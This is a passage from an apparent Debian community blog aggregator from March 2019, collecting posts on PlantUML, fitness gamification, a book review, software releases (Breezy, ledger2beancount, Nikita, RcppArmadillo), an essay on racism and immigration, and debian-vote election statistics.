This is what the complete diagram for the PlantUML notation above look like:

A cool feature of PlantUML is that the generated PNG files include the entire original source diagram as text. The source (with include statements expanded) can be extracted using for example exiftool. Another cool feature is that parts of the entities can be hidden after inclusion. This allow to use include files with all attributes listed, even for UML diagrams that should not list any attributes.

The diagram also show some of the warts. Some times the layout engine place text labels on top of each other, and some times it place the class boxes too close to each other, not leaving room for the labels on the relationship arrows. The former can be worked around by placing extra newlines in the labes (ie "\n"). I did not do it here to be able to demonstrate the issue. I have not found a good way around the latter, so I normally try to reduce the problem by changing from vertical to horizontal links to improve the layout.

All in all, I am quite happy with PlantUML, and very impressed with how quickly its lead developer responds to questions. So far I got an answer to my questions in a few hours when I send an email. I definitely recommend looking at PlantUML if you need to make UML diagrams. Note, PlantUML can draw a lot more than class relations. Check out the documention for a complete list. :)

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

25 March, 2019 08:35AM

Iustin Pop

The last 10 percent

Gamification is everywhere this days, but sometimes it’s well implemented, sometimes not. In this particular case—Garmin environment—it introduced badges around a year or two ago for all kind of things (whether real achievements or not), most of them interesting or at least funny, like having an activity while below 0°C, etc.

The other nice part of all this was that it allows you to easily compare badges with connections. Which results, err can result in races to both get the badges your connections have but you don’t, and get ones that they don’t. All this because it also has a leaderboard based on the total points accumulated—and some badges are worth way more points than basic ones.

One thing I found out this way was that some of my connections had the “achieve step goal 30 days in a row” (4 points!), or even 60 days (8 points!!!). But how can this be, since by default Garmin increases the goal as long as you hit each day’s goals? This was the reason I couldn’t get it before, as the target inexorably increases, and would reach something like 3 hours of walking needed per day at 60 days.

So, my conclusion was that this is possible only with switching to fixed-goal (N steps per day), and did so. I set myself a moderate goal (I don’t walk much, sadly, especially when I commute by bike), and started working towards it. This was back in December. And I still don’t have the badge, argh!

In the first iteration, I went all the way up to 29 days, had 40 steps left for the day, was almost celebrating, but at the end of the day completely forgot about it—because it was just 2 minutes of moving needed. 29 days of carefully checking each evening my goal, all gone away due to early sleeping during vacation… All that was between me and my goal were 40 lousy steps.

I said no problem, I’ll start again. So once more I go, all the way up to 28 days, when sadly external factors intervened and I really couldn’t hit my goal on the 28th day. At least not my fault this time, or at least partially not my fault—had I met my goal early in the day and not leave it to match on the evening, I would have still gotten it.

So, on third iteration now. All went well until day 24th or so, when I got a bit of a cold. This was Wednesday last week, but still, between stuff (I got out of the house that day), it was easy to get the steps. Then, Thursday, I was really out and stayed in-house, with running nose and headache and all that stuff, when I realised: this is a “you-will-not-get-the-badge” event type!! Damn you dungeon master! I needed to move. So here I was, indoors, slowly pacing between the hot teas, for one hour, then after some sleep for another hour, until I hit my goal. Yay!

Today (Monday), I’m at 27 days out of 30. If I hit my goal today, tomorrow and Wednesday, I’ll finally have the damn badge and can both increase my target steps and start working towards the 60 day badge.

But three days is a lot. Many things could happen, including the worst case: my watch could stop working or I could lose it. And I don’t have a backup… I need to be careful…

So yeah, sometimes gamification really works :)

25 March, 2019 05:52AM

hackergotchi for Martin Michlmayr

Martin Michlmayr

ledger2beancount 1.6 released

Stefano Zacchiroli and I released version 1.6 of ledger2beancount, a ledger to beancount converter.

This release contains a number of bug fixes and a new feature:

  • Add support for fixated prices and costs
  • Handle account names that contain brackets
  • Don't parse trailing tabs as part of the account name
  • Escape backslashes in the narration

You can get ledger2beancount from GitHub.

25 March, 2019 05:12AM by Martin Michlmayr

Russ Allbery

Review: The Love Song of Numo and Hammerfist

Review: The Love Song of Numo and Hammerfist, by Maddox Hahn

Publisher: Maddox Hahn
Copyright: 2018
ISBN: 1-73206-630-2
Format: Kindle
Pages: 329

Numo is a drake, a type of homunculus created by alchemy from a mandrake root. He is, to be more precise, a stoker: a slave whose purpose is to stoke the hypocaust of his owning family. Numo's life is wood and fires and the colors of flames, not running messages to the arena for his master. (That may be part of the message his master was sending.) Falling desperately in love at first sight with an infandus fighting in the arena is definitely not part of his normal job.

Hammerfist is an infandus, the other type of homunculus. They aren't made from mandrake root. They're made from humans who have been sentenced to transmogrification. Hammerfist has had a long and successful career in the arena, but she's starting to suffer from the fall, which means she's remembering that she used to be human. This leads to inevitable cognitive decline and eventually death. In Hammerfist's case, it also leads to plotting revolution against the alchemists who make homunculi and use them as slaves.

Numo is not the type to plot revolution. His slave lobe is entirely intact, which means the idea of disobeying his owners is hard to even understand. But he is desperately in love with Hammerfist (even though he doesn't understand what love is), and a revolution would make her happy, so he'll gamely give it a try.

Numo is not a very good revolutionary, but the alchemists are also not very bright, and have more enemies than just the homunculi. And Numo is remarkably persistent and stubborn once he wraps his head around an idea.

Okay, first, when I say that you need a high tolerance for body horror to enjoy this book, I am Seriously Not Kidding. I don't think I have ever read a book with a higher density of maiming, mutilation, torture, mind control, vivisection, and horrific biological experiments. I spent most of this book wincing, and more than a few parts were more graphic than I wanted to read. Hahn's style is light and bubbly and irrepressible and doesn't dwell on the horror, which helps, but if you have a strong visual imagination and body integrity violations bother you, this may not be the book for you.

That said, although this book is about horrible things, this is not a horror novel. It's a fantasy about politics and revolution, about figuring out how to go forward after horrible things happen to you, about taking dramatic steps to take control of your own life, about the courage to choose truth over a familiar lie, and about how sympathy and connection and decency may be more important than love. It's also a book full of gruesome things described in prose like this:

Her eyes were as red as bellowed embers. Her blood-spattered mane stood up a foot or more from her head and neck, cresting between her shoulders like a glorious wave of shimmering heat. Her slobbering mouth was an orangey oven of the purest fire, a font of wondrousness gaping open down to the little iron plate stamped above her pendulous bosoms.

and emotions described like this:

And he'd had enough. Numo was taut as a wire, worn as a cliff face, tired as a beermonger on the solstice. One more gust of wind and he'd snap like a shoddy laundry pole.

This is the book for simile and metaphor lovers. Hahn achieves a rhythm with off-beat metaphor and Numo's oddly-polite mental voice that I found mesmerizing and weirdly cheery.

Except for Numo and Hammerfist, nearly everyone in this book is awful, even if they don't seem so at first. (And Hammerfist is often so wrapped up in depression and self-loathing to be kind of awful herself.) Next to the body horror, that was the aspect of this story I struggled with the most. But Numo's stubborn determination and persistent decency pulled me through, helped by the rare oasis of a supporting character I really liked. Bollix is wonderful (although I'm rather grumpy about how her story turns out). Sangja isn't exactly wonderful — he can be as awful to others as most of the people in this story — but for me he was one of the most sympathetic characters and the one I found myself rooting for.

(I'm going to be coy about Sangja's nature and role, since I think it's a spoiler, but I greatly appreciated the way Hahn portrayed Sangja in this book. He is so perfectly and exactly fits the implications of his nature in this world, and the story is entirely matter-of-fact about it.)

Hahn said somewhere on-line (which I cannot now find and therefore cannot get exactly right) that part of the motivation for this story was the way the beast becomes human at the end of Beauty and the Beast stories, against all of our experience in the real world. Harm and change isn't magically undone; it's something that you still have to live with past the end of the story. This is, therefore, not a purely positive good-triumphs type of story, but I found the ending touching and oddly satisfying (although I wish the cost hadn't been so high).

I am, in general, dubious of the more extravagant claims about the power of self-publishing to bypass gatekeepers, mostly because I think traditional publishing gatekeepers do a valuable job for the reader. This book is one of the more convincing exceptions I've seen. It's a bit of a sprawling mess in places and it doesn't pull together the traditional quest line, which combined with the body horror outside the horror genre makes it hard for me to imagine a place for it in a traditional publishing line-up. But it's highly original, weirdly delightful, and so very much itself that I'm glad I read it even if I had to wince through it.

This is, to be honest, not really my thing, and I'm not sure I'd read another book just like it. But I think some people with more interest in body horror than I have will love this book, and I'm not at all unhappy I read it. If you want your devoted, odd, and angstful complex love story mixed with horrific images, gallows humor, and unexpected similes, well, there aren't a lot of books out there that meet that description. This is one. Give it a try.

Rating: 6 out of 10

25 March, 2019 02:22AM

March 24, 2019

Sam Hartman

Questioning and Finding Purpose

This is copied over from my spiritual blog. I'm nervous doing that, especially at a point when I'm more vulnerable than usual in the Debian community. Still, this is who I am, and I want to be proud of that rather than hide it. And Debian and the free software community are about far more than just the programs we write. So hear goes:

The Libreplanet opening keynote had me in tears. It was a talk by Dr. Tarek Loubani. He described his work as an emergency physician in Gaza and how 3d printers and open hardware are helping save lives.


They didn't have enough stethoscopes; that was one of the critical needs. So, they imported a 3d printer, used that to print another 3d printer, and then began iterative designs of 3d-printable stethoscopes. By the time they were done, they had a device that performed as well or better than than a commercially available model. What was amazing is that the residents of Gaza could print their own; this didn't introduce dependencies on some external organization. Instead, open/free hardware was used to help give people a sense of dignity, control of some part of their lives, and the ability to better save those who depended on them.


Even more basic supplies were unavailable. The lack of tourniquets caused the death of some significant fraction of casualties in the 2014 war. The same solution—3d-printed tourniquets had an even more dramatic result.


Dr. Loubani talked about how he felt powerless to change the world around him. He talked about how he felt like an insignificant ant.


By this point I was feeling my own sense of hopelessness and insignificance. In the face of someone saving lives like that, I felt like I was only playing at changing the world. What is helping teach love and connection when we face that level of violence? Claming that sexual freedom is worth fighting for seems like a joke in the worst possible taste in the face of what he is doing. I felt like an imposter.


Then he went on to talk about how we are all ants, but it is the combination of all our insignificant actions that eventually change the world. He talked about how the violence he sees is an intimate act: he talked about the connection between a sniper and their victim. We die one at a time; we can work to make things better one at a time.


He never othered or judged those committing violence. Not as he talked about his fellow doctor and friend who was shot, radioed that he could not breathe, and eventually died pinned down by gunfire so that no one could rescue him. Not as he talked about how he himself was shot. Not as he helped the audience connect with grief-stricken family members facing the death of their loved ones. He never withdrew compassion.


To me I heard hope that what I try to teach can matter; it can connect. If he can face that violence and take a stand against it while still maintaining compassion, then this stuff I believe actually can work. Facing the world and making real changes without giving up compassion and empathy seems more possible: I’ve seen it done.


Somewhere in this talk, I regained a connection with my own value. People like him are helping save people. However, the violence will continue until we have the love, empathy and compassion to understand and connect with each other and find better options. In my own way I’m doing that. Every time I help someone see a different way of looking at things, I make it easier for them to start with empathy first rather than fear.


Everything I’ve written about sex is still true. That journey can bring us closer to accepting ourselves, stepping past fear and shame. Once we accept our own desires and our own need, we’re in a better position to meet in the Strength of Love and advocate for our own needs while offering compassion to others. Once we know what we can find when we have empathy and connection, we can learn to strive for it.


So I will find joy in being my own little ant. Insignificant and divine: take your pick as it’s all the same in the end.


Bringing that Round to Debian


Debian is back in the center of my compassion work. I'm running for Debian project Leader (DPL). I served on the Debian Technical Committee for over a year, hoping to help bring understanding of diverse positions to our technical dispute resolution process. That ended up being the wrong place. Everyone seems to believe that the DPL is currently at the center of most of the work of helping people connect. I hope to fix that: more than one person should be driving that work.


After the keynote I found myself sitting between Micky Metts and Henry Poole. Micky asked me what I did that I loved. “Ah, she’s not expecting this answer,” I thought to myself as I talked about my spiritual work and how it overlaps with my Debian work. It turns out that she was delighted by the answer and we had a great time chatting about self empowerment. I’m looking forward to her keynote later today.


Then Henry asked how I was going to accomplish bringing empathy into Debian. I talked about my hopes and dreams and went through some of the specifics I’ve discussed in my platform and what I’ve had success with so far. He talked about similarities and overlaps with work his company does and how he works to teach people about free software.


Especially after that keynote it was joyful to sit between two luminaries and be able to share hopes for empathy, compassion and connection. I felt like I had found validation and energy again.

24 March, 2019 08:04PM

hackergotchi for Shirish Agarwal

Shirish Agarwal

Questions about Racism, Immigration


Racial Attacks in New Zealand

I can’t believe it’s been almost a year since I wrote the blog post about Racism . While that one was in response to Russel’s post about a year back, this one is about the cowardly attack on the 50 odd and rising people died in the racist attack in New Zealand few days back. While I knew things were and charged with Trump and the right or/and alt right is rising in Europe as well but didn’t know that the fire had spread through Australia and New Zealand as well. And before people point fingers, it isn’t as if India is any better in the current circumstances. I came to know of the news on twitter where a gentleman named Khaled Beydoun broke the story . I had not been well the day before hence after work had just slept and woke mid-afternoon. I usually freshen myself but that day either due to laziness or whatever, I opened and was shocked when I read the news on twitter. My eyes, brain must have not properly woken up as I urged Khaled, along with many others to share the stories of the victims so people might know about them. In India, it has been more or less characterised as something to celebrate with slogans like ’50 would-be terrorists slain’ and such nonsense, I did feel it was part of some larger scheme as then also heard that the shooter had a webcam and live-streamed the whole thing on Facebook. Around the same time or a little later, also came to know about Senator Fraser Anning who talked about ‘White Australia’ . The idea behind ‘White Australia’ has been mirrored by the Right in Poland today/yesterday.

Immigration

The idea is similar in many ways to what Brexiteers told to people living in Britain. In essence we see the following characteristics –

a. Immigrants are the problem of all problems – While time and again has shown that Immigrants have been the source of growth in all developed countries, they are still able to get that particular message across. We had movies like Pathemari from South and fortunately or unfortunately many more movies on the same subject pursued in Hollywood. Some of the movies which I have enjoyed and have also found challenging are Moscow on the Hudson, (one of the best performances given by Robin Williams, The Immigrant , Man Push Cart, The Namesake (the Novel first and then the Movie) , Brooklyn , Sugar and many more. To distill down, all the movies, it comes to a singular fact, we love the place where we are born. We learn the taste, the smell, the culture and are assimilated by it long before we know it. It is only when people go to a different place whether to visit or to live as an immigrant that a dissonance is created and people spend their whole lives trying to fix the dissonance somehow.

In fact, I know at least 10-15 friends and family personally who have been forced into being Economic migrants for life, many of them into IT or Information Technology or business. While I may have shared this pattern before, just a few months back, (without taking names), a friend of mine wound up going back to States. He had made good money in States, is and was at a high post, had made enough money to buy a bungalow in Pune. He sent resumes from United States to Indian companies in and around Pune where they promised him comparative earnings, But when he was back in the excuse of being with the family i.e. father, mother, sister et al he found that they were promising him now half or 1/3rd of what they had promised him before. And this is without any of the benefits which he was enjoying in States. His wife is also from Pune, India and a working professional. In the end, he had to sell his bungalow and say a tearful bye to his parents and sister. This is the case in almost all of Kothrud. I may have shared about Kothrud before. This is a place around 5-6 kms. from my place, where thousands of parents are living a good life as their children are abroad. They feel good that the children are earning good, but many or most of them miss the human touch, the love and care that children can give. There are now non-profits and even the police who do try to care of the old and the aged but there is only so much they can do.

Why people leave, the Brain Drain and Politics in India

Just to share some facts about the Indian Industry, the Indian Government has several plans and schemes on paper, but most of them are unworkable in real life. They have fallen flat as Startup India and ‘Make in India‘ which have been reduced to being mere logos within India. In fact, almost all economic indicators are at a record low. While except for mobiles, most electronic products are stalling, even Cars and Bikes sales which are known as bell-weathers of how the Indian Economy is doing tells the story well. In fact, the current stats. of unemployment should raise a cause of concern. The story does have political colors as now it has come to light that RBI had advised against demonetisation before it was announced and now we are fully into election mode. There is and was China-bashing without realizing we need them as we have no alternatives and even no plan. There have been accusations being made against Pandit Nehru for giving the UNSC seat without understanding the politics behind it. While I of course, need to read more of history, it does point to the fact that if Pandit Nehru had taken the seat, then India would have had war with China in 1955 rather than 1962 when it did. The reason I shared the above is at least most of the problems in India are of its own making, or at the very least, its leaders, the same I fear could possibly be said of many countries.

A hypothesis

There are couple of other painful truths which I feel we don’t want to face, we are all migrants if we believe and support the hypothesis and observation that anthropologists have made about Homosapiens, to the extent as to where they were found and how migration happened over generations. By the same coin, an argument can be made that all of us have our hands bloody. Either in the recent or waaay in the past, the history we don’t know, we either wilfully or tacitly killed whatever was native to each land, whether it was humans or nature itself.

Reasoning for fear of Immigration

b. Nationalism will solve all the problems – There is this wide-spread belief that either ultra-nationalism, or being ultra-whatever will solve all problems. It took more than 200 years for the separation between the church and the State if you read the article on Wikipedia and look up some of the links they have mentioned therein and less than 5 years with help of technology to try to have them together. The idea of one race, one thought has been peddled before and it has resulted into untold destruction. and there is no evidence to point that it will be anything different today.

c. The main crux though of the matter though is probably Immigration and jobs, security – This is where the actual fight is. Most people believe that the natural-born should have some sort of entitlement, more than the Immigrants and that Immigrants get favors which from at least my reading has not been true at all. One point though, I am talking about Economic Migrants here and NOT migrants who end up elsewhere from where they are due to war, famine, natural calamities. For such people who are the unluckiest because they are not in charge of their fates I have no clue as it is much more complex than Economic migrants. Any solutions should have humanitarian focus but is easily pulled into politics as has been seen in India and potentially is the same for other countries as well. It is very much possible that at some future date, we may find India culpable in Rohingya genocide if that becomes the case. This reminds me very much of the Komagata Maru incident in which Indians died and the Canadian PM later apologized.

There was only one advertisement from some European freezing country (climate-wise) which said they will provide or give a house to whoever migrates there (have forgotten the name of the country) but in most countries Immigrants have quite a number of issues. Last year when trying to understand about Taiwan, came to know about immigration issues within Taiwan, much of which is espoused quite nicely in the recent issue of thediplomat. I would venture other countries would have similar issues. I had shared before when I visited Qatar and came to know that in almost all Middle-east countries Indians and people from the sub-continent have a work visa and in many ways they are bonded labourers. Only last year they have made some changes. After coming back to India, Pune I was able to ask and know from many people both in Pune and elsewhere and all of them had similar stories to share. I remember reading some article about immigration laws to Australia in which it was said that if a doctor trained in India were to migrate to Australia, he would have to go through the residency period all over again. That would add another 5-7 years for learning medicine again when s(he) could have been helping. This was shared not just in the article but also shared by personal experiences of few friends and people I met, casually had a chat and so on.

Why not Ban Immigration At all

If Immigration is such an issue why not ban it ? The New Scientist ran a series of articles on the same topic couple of years ago. While I would recommend to read them all, the best one which resounded within me was this one . I had a coincidence to meet quite a few doctors, nurses etc. during my travels, also when I was ill in the hospital. My landlord too was a Doctor who served all his life in UK in NHS . While we have somewhat of a quarrel-some relationship due to renter and rentee, he has shared lot about NHS in Britain. Interestingly, lot of his colleagues were from India, apparently close to 30-40% of the doctors and nurses are from India. The same I have heard about Gulf Countries as well. There are also articles by Rukhsana Khan, I especially liked the article in which she shares about immigration in Canada which I found to be quite interesting. The comments much more so as it tells how much as a species we have yet to grow.

The Positives

While the cost has been high, there has been a net positive as far as inclusiveness for New Zealand is concerned. Jacinda Ardern, the world’s youngest female leader, as shared by Economist had been forthright, critical and called it a terrorist attack. This must have been really difficult for Jacinda to do politically especially when you see her background as shared by Economist, the reasons people chose her. But this is what leaders are expected to do, to lead and not be predictable. This is something our great leader has not been able to. The whole world has commended her for the way she has managed to lead, both with grace and empathy. While I did see some people commenting on her need to use the hijab, most people have complimented her for the way she communicated and foremore, bringing restriction to gun ownership esp. in automated rifles . This is something that United States has failed to do despite so many killings which have taken place 😦

While the post has turned to be long there are still many feelings yet to be expressed, the first one is from a person of whose work I am a fan of and make no bones about it –

TL;DR: The effects of the rise of right wing populism are not dramatic and visible. Often they just involve an excruciating micronegotiation of your body and its place in geographies of suspicion. Do you know what happens when you wear skin and body of suspicion? In a country that overnight feels hostile because of an abhorrent act of terrorism, and an election that exercised the democratic will of bringing into power a fundamental extremist political party, you scan your everyday modes of being. The routines and ruts of habitual living suddenly become unfamiliar, suspect, alien. You take on the double weight of the loss and grief of the victims and the shame and repentance of the perpetrator. You inherit pity and terror of the tragedy with no catharsis. And you see yourself change. Instantaneously.

1. You find yourself smiling more. Whenever you are in public, you make an extra effort to smile at strangers, to convince them that the bag on your shoulders only has your laptop and no other weapon.

2. When you see the increased security, you try to look small, wrapped up in a shrug, to convince the scrutinizing gaze that you are not a menace.

3. When you sit on the train you realise that you sit differently. Not taking as much space, Keeping all your limbs to yourself, breathing in self-defence.

4. Your phone vibrates while you are sitting in the train. It is your mom. You wonder if you should take the call, and speak in your heathen tongue, and if it will offend or alarm people around you.

5. You hear the couple sitting next to you, peering over a train time-table and trying to figure out where they should change trains. You pause for a long moment before you give them advice in a language that you only speak brokenly.

6. You pretend not to notice the raised eyebrows when you betray your outsider status by speaking the local language clumsily, and accept the reluctant thanks before trying to hide behind your phone.

7. You are hungry. There is a lunch box in your bagpack. It is the left-over curry from dinner last night. You hesitate opening it lest the smells of your food bring forth a reaction that you might not be able to digest.

8. As you walk to the building where you have a meeting, you see a group of people drinking beer and being loud, and you instinctively scan to see if there is another entrance into the building that you can detour to.

9. You find solidarity in the people who are angry and in shock at this changed electoral and cultural trend in their country. They lament about how things are going bad. You don’t join them and instead spend all your effort in assuring them that you do not blame them, that you are happy to have them as friends and colleagues; you swallow your feeling of vague dread and spend time consoling them about the fate of things to come.

10. You meet a friend. You sit in a café and talk. You see a small group of people in their older whateveragebrackets pointedly looking at you and looking away when you catch their eye. When you see it happening more than once, you talk your friend into going somewhere else. When asked why, you say, ‘this is just so loud’.

11. You sit through an academic discussion. People are talking about vulnerability and safety. Care and creativity show up. The smart, insightful, and inspiring conversations develop, surrounded by plenty and privilege. You drone out because you remember the 5 refugees that you are counselling, who have sent you messages that given the current political climate, they want to drop out of their education development programme. Now is not a good time to be visible, one 19 year old has said.

12. You enter the central station and realise that you are going to have to sprint to the train. You are used to this. But today you walk measured footsteps even though you are going to miss the train. You don’t want to be running in your body, on a late evening train station. You miss the train and wait in the cold wind plucking at your cheeks, for the next one that takes you home.

13. On the ride back, you compose your face in rehearsed pleasantness. You wear your Asian niceness on your cheeks. The tiredness of the day has no place on your face. You are good, you are not a threat, you are acceptable.

14. You put on your headphones and are going to switch to the usual Bollywood mix that you listen to when you walk home. Before you do that, you remove the headphones and play the music. You are checking to see if the music is too loud, and seeping out of the headphones, betraying its ethnicity in its foreign cadences. You lower the volume and decide to play an American pop mix anyway.

15. You walk home on routine routes when you see three people walking behind you. It is a public space. It is your everyday route home. There are people around. You slow down to let them pass. You find comfort in the bagpack snuggling your back, like an armour.

16. You are fumbling for your keys at the entrance of the building. Somebody walks out of the door at the same time. You are happy not to be fishing for keys, so you ask them to hold the door and scurry up inside. The person asks where you want to go. You tell them you live here. You have never seen each other. You nod, wanting to get home. You get out of the slow elevator and from around the corner you see the person from downstairs looking at you. She has taken the stairs to see you safe home.

17. You enter home and even before you have taken off the bag, or the double layers of coats on your shoulder, you feel a weight come off your shoulders. You stretch to your full height. You breathe deeply. In the solace of solitude, you feel the layers of the day strip off. You head into a warm shower and wash all the gazes that have scorched your body. You step out. While drying in front of the misty mirror., you realise that if this continues, it will soon become habit. When your body is a question, you live like an apology. And these are the experiences of a life that is well shielded, protected, and supported by privilege, mobility, work, health, communities of love and trust, and money. So for anybody who is more precarious this must be amplified multiple times. If you know somebody who feels that they are bodies and skins of suspicion, now you know the cruel algebra of life that they are constantly solving. If somebody tells you they are worried, anxious, feeling afraid because of what this populist verdict has delivered, don’t downplay their dread. It is theirs. Let them work through it. You cannot change it by merely offering your love and care. It helps, but this is not a personal question of feelings – it is a structural problem of survival. Their experience is not an accusation towards you. It is merely an apology for themselves. You might not have voted for this to happen. But you are still a part of the system, and the only way out of this is for us to challenge the normalization of hatred and violence.

https://nishantshah.online/ , Nishant Shah , Academic, Educator, Researcher and Annotator, Netherlands.

As shared by Nishant, while I have not met him, have had the privilege to have read many of the articles penned by him many a times in Indian Express and other places. We also have managed to near-miss each other even though I have been to Bangalore quite a number of times to CIS when he was part of CIS . Also this is not just about what he experienced and what many other people who are foreigners or migrants feel, it is also to shed a light to all those who think of migration as the geese which lays the golden goose but forget the cost.

The other is one of my favorite lyricist, poet, writer who made many marriages happen and also likely to bear the cross for the same (from either husbands or wives) Miyan Javed Akhtar Sahab –

To speak of that which everyone is fearful, of that you must write
The night was never so dark ever before, write!

Throw away the pens with which you wrote the odes
In praise of the true pen dipped in the heart’s blood, write!

The narrow circles that confine you, break all of them
Come under the open skies now, of a new creation, write!

That which finds no place in the daily newspapers
That incident which happens everywhere every day, write!

That which has happened finds mentions
But of those that should have happened, write!

If you wish to see spring return to this garden
Call out from every branch and on every leaf, write!

Written by Miyan Javed Akhtar Sahab, translated by Rakshanda Jalil for scroll.in where it first appeared digitally to my knowledge.

24 March, 2019 05:26PM by shirishag75

Jelmer Vernooij

Breezy evolves

Last month Martin, Vincent and I finally released version 3.0.0 of Breezy, a little over a year after we originally forked Bazaar.

When we started working on Breezy, it was mostly as a way to keep Bazaar working going forward - in a world where Python 2 has mostly disappeared in favour of Python 3).

Improvements

Since then, we have also made other improvements. In addition to Python 3 support, Breezy comes with the following other bigger changes:

Batteries Included

Breezy bundles most of the common plugins. This makes the installation of Breezy much simpler (pip install brz), and prevents possible issues with API incompatibility that plagued Bazaar.

Bundled plugins include: grep, git, fastimport, propose, upload, stats and parts of bzrtools.

>120 fixed bugs

Since Bazaar 2.7, lots of bugs in the Bazaar code base have been fixed (over 120 as of March 2019). We've also started an effort to go through all bugs in the Bazaar bug tracker to see whether they also apply to Breezy.

Native Git Support

Breezy now supports the Git file formats as a first class citizen; Git support is included in Breezy itself, and should work just as well as regular Bazaar format repositories.

Improved abstractions

Bazaar has always had a higher level API that could be used for version control operations, and which was implemented for both Bazaar, Git and Subversion formats.

As part of the work to support the Git format natively, we have changed the API to remove Bazaar-specific artefacts, like the use of file ids. Inventories (a Bazaar concept) are now also an implementation detail of the bzr formats, and not a concept that is visible in the API or UI.

In the future, I hope the API will be useful for tools that want to make automated changes to any version controlled resource, whether that be Git, Bazaar, Subversion or Mercurial repositories.

24 March, 2019 04:00PM by Jelmer Vernooij

Petter Reinholdtsen

Release 0.3 of free software archive API system Nikita announced

Yesterday, a new release of Nikita Noark 5 core project was announced on the project mailing list. The free software solution is an implementation of the Norwegian archive standard Noark 5 used by government offices in Norway. These were the changes in version 0.3 since version 0.2.1 (from NEWS.md):

  • Improved ClassificationSystem and Class behaviour.
  • Tidied up known inconsistencies between domain model and hateaos links.
  • Added experimental code for blockchain integration.
  • Make token expiry time configurable at upstart from properties file.
  • Continued work on OData search syntax.
  • Started work on pagination for entities, partly implemented for Saksmappe.
  • Finalise ClassifiedCode Metadata entity.
  • Implement mechanism to check if authentication token is still valid. This allow the GUI to return a more sensible message to the user if the token is expired.
  • Reintroduce browse.html page to allow user to browse JSON API using hateoas links.
  • Fix bug in handling file/mappe sequence number. Year change was not properly handled.
  • Update application yml files to be in sync with current development.
  • Stop 'converting' everything to PDF using libreoffice. Only convert the file formats doc, ppt, xls, docx, pptx, xlsx, odt, odp and ods.
  • Continued code style fixing, making code more readable.
  • Minor bug fixes.

If free and open standardized archiving API sound interesting to you, please contact us on IRC (#nikita on irc.freenode.net) or email (nikita-noark mailing list).

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

24 March, 2019 01:30PM

March 23, 2019

hackergotchi for Riku Voipio

Riku Voipio

On the #uploadfilter problem

The copyright holders in europe are pushing hard mandate upload filters for internet. We have been here before - when they outlawed circumventing DRM. Both have roots in the same problem. The copyright holders look at computers and see bad things happening to their revenue. They come to IT companies and say "FIX IT". It industry comes back and says.. "We cant.. making data impossible to copy is like trying to make water not wet!". But we fail at convincing copyright holders in how perfect DRM or upload filter is not possible. Then copyright holders go to law makers and ask them in turn to fix it.

We need to turn tables around. If they want something impossible, it should be upto them to implement it.

It is simply unfair to require each online provider to implement an AI to detect copyright infringement, manage a database of copyrighted content and pay for the costs running it all.. ..And getting slapped with a lawsuit anyways, since copyrighted content is still slipping through.

The burden of implementing #uploadfilter should be on the copyright holder organizations. Implement as a SaaS. Youtube other web platforms call your API and pay $0.01 each time a pirate content is detected. On the other side, to ensure correctness of the filter, copyright holders have to pay any lost revenue, court costs and so on for each false positive.

Filtering uploads is still problematic. But it's now the copyright holders problem. Instead people blaming web companies for poor filters, it's the copyright holders now who have to answer to the public why their filters are rejecting content that doesn't belong to them.

23 March, 2019 04:07PM by Riku Voipio (noreply@blogger.com)

March 22, 2019

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

RcppArmadillo 0.9.300.2.0

armadillo image

A new RcppArmadillo release based on a new Armadillo upstream release arrived on CRAN and Debian today.

Armadillo is a powerful and expressive C++ template library for linear algebra aiming towards a good balance between speed and ease of use with a syntax deliberately close to a Matlab. RcppArmadillo integrates this library with the R environment and language–and is widely used by (currently) 583 other packages on CRAN.

The (upstream-only this time) changes are listed below:

Changes in RcppArmadillo version 0.9.300.2.0 (2019-03-21)

  • Upgraded to Armadillo release 9.300.2 (Fomo Spiral)

    • Faster handling of compound complex matrix expressions by trace()

    • More efficient handling of element access for inplace modifications in sparse matrices

    • Added .is_sympd() to check whether a matrix is symmetric/hermitian positive definite

    • Added interp2() for 2D data interpolation

    • Added expm1() and log1p()

    • Expanded .is_sorted() with options "strictascend" and "strictdescend"

    • Expanded eig_gen() to optionally perform balancing prior to decomposition

Courtesy of CRANberries, there is a diffstat report relative to previous release. More detailed information is on the RcppArmadillo page. Questions, comments etc should go to the rcpp-devel mailing list off the R-Forge page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

22 March, 2019 10:57PM

Enrico Zini

debian-vote statistics

Updated: re-run 2019-04-02

Updated: re-run after merging Andreas Tille's addresses

Updated: re-run after fixing a bug in the code that skips signatures

Updated: re-run on a mailbox with only the post-nomination discussion.

I made a script to compute some statistics on debian-vote's election discussions.

Here are the result as of 2019-04-02 12:00 UTC+1:

These are the number of mails sent by people who posted more than 2 messages:

Name                              Mails
=======================================
Jonathan Carter                      33
Joerg Jaspert                        31
Martin Michlmayr                     20
Sam Hartman                          18
Andreas Tille                        11
Lucas Nussbaum                        8
Stefano Zacchiroli                    8
Sean Whitton                          7
Jose Miguel Parrella                  6
Jonas Meurer                          5
Paulo Henrique de Lima Santana        5
Laura Arjona Reina                    4
martin f krafft                       4
Louis-Philippe_Véronneau              3
Alexander Wirt                        3
Ansgar                                3
Ian Jackson                           3
Paul Wise                             3
Raphael Hertzog                       3

These are sum and averages of lines of non-quoted message text sent by people:

Name                                Sum   Avg
=============================================
Jonathan Carter                    1475    45
Sam Hartman                         799    44
Joerg Jaspert                       684    22
Martin Michlmayr                    665    33
Andreas Tille                       287    26
Lucas Nussbaum                      204    26
Jose Miguel Parrella                167    28
Ian Jackson                         140    47
Stefano Zacchiroli                  127    16
Sean Whitton                        109    16
Jonas Meurer                         96    19
Paulo Henrique de Lima Santana       89    18
Laura Arjona Reina                   80    20
Ansgar                               68    23
martin f krafft                      68    17
Louis-Philippe Véronneau             67    22
Raphael Hertzog                      43    14
Alexander Wirt                       36    12
Paul Wise                            23     8

These are the top keywords of messages sent by the candidates so far, scored by an improvised TFIDF metric:

Sam Hartman
  valuable, people, helping, things, consensus, project, think
Jonathan Carter
  software, think, make, help, time, free, project
Joerg Jaspert
  thats, nice, whatever, stuff, people, simple, need
Martin Michlmayr
  believe, foss, where, maybe, people, world, these

22 March, 2019 11:48AM

Elana Hashman

SREcon19 Americas Talk Resources

At SREcon19 Americas, I gave a talk called "Operating within Normal Parameters: Monitoring Kubernetes". Here's some links and resources related to my talk, for your reference.

